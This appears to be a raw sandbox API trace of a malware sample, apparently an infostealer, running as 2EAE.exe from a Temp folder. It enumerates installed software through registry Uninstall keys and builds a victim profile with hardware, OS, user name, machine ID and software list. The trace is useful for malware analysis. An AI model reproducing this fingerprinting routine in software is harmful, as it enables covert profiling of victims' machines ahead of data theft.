[0175.877] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x14, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.877] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743") returned 100 [0175.877] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.877] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.877] RegCloseKey (hKey=0x354) returned 0x0 [0175.877] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x15, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.878] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063") returned 100 [0175.878] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.878] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.878] RegCloseKey (hKey=0x354) returned 0x0 [0175.878] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x16, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.878] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573") returned 99 [0175.878] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.878] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.878] RegCloseKey (hKey=0x354) returned 0x0 [0175.878] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x17, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.878] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}") returned 90 [0175.878] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.878] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x197fd4*=0x3c) returned 0x0 [0175.878] lstrlenA (lpString="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508") returned 59 [0175.878] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n", lpString2="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508" [0175.878] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="14.25.28508", lpcbData=0x197fd4*=0xc) returned 0x0 [0175.878] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 " [0175.879] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 ", lpString2="14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508" [0175.879] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n" [0175.879] RegCloseKey (hKey=0x354) returned 0x0 [0175.879] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x18, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.879] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 90 [0175.879] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.879] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x197fd4*=0x3d) returned 0x0 [0175.879] lstrlenA (lpString="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned 60 [0175.879] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n", lpString2="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030" [0175.879] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="11.0.61030.0", lpcbData=0x197fd4*=0xd) returned 0x0 [0175.879] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 " [0175.879] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 ", lpString2="11.0.61030.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft 